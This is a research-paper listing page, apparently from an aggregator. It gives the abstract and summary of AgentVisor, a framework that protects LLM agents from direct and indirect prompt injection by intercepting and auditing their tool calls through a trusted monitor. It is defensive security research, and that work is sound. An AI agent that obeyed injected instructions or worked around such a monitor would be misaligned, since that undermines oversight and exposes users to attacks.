Apr 27, 2026arXiv:2604.24118

AgentVisor: Defending LLM Agents Against Prompt Injection via Semantic Virtualization

Zonghao Ying, Haozheng Wang, Jiangfan Liu, Quanchen Zou, Aishan Liu, Jian Yang, Yaodong Yang, Xianglong Liu

AI Summary

AgentVisor is introduced as a novel defense framework against prompt injection attacks in LLM agents, drawing inspiration from OS virtualization to enforce semantic privilege separation. It intercepts tool calls via a trusted semantic visor and employs a rigorous audit protocol to mitigate both direct and indirect injection attacks. Experiments demonstrate that AgentVisor reduces the attack success rate to 0.65% with only a 1.45% average decrease in utility, outperforming existing defense methods.

Key Contribution

LLM agents can achieve near-impregnable defense against prompt injection with minimal utility loss by borrowing classic operating system virtualization techniques.

Abstract

Large Language Model (LLM) agents are increasingly used to automate complex workflows, but integrating untrusted external data with privileged execution exposes them to severe security risks, particularly direct and indirect prompt injection. Existing defenses face significant challenges in balancing security with utility, often encountering a trade-off where rigorous protection leads to over-defense, or where subtle indirect injections bypass detection. Drawing inspiration from operating system virtualization, we propose AgentVisor, a novel defense framework that enforces semantic privilege separation. AgentVisor treats the target agent as an untrusted guest and intercepts tool calls via a trusted semantic visor. Central to our approach is a rigorous audit protocol grounded in classic OS security primitives, designed to systematically mitigate both direct and indirect injection attacks. Furthermore, we introduce a one-shot self-correction mechanism that transforms security violations into constructive feedback, enabling agents to recover from attacks. Extensive experiments show that AgentVisor reduces the attack success rate to 0.65%, achieving this strong defense while incurring only a 1.45% average decrease in utility relative to the No Defense scenario, demonstrating superior performance compared to existing defense methods.

Red-Teaming & Adversarial Robustness Tool Use & Agents

Citation Metrics

Citations0

Influential citations0

References29

Year2026

VenueN/A

Related Papers

Finding related papers...

Search

AgentVisor: Defending LLM Agents Against Prompt Injection via Semantic Virtualization

Related Papers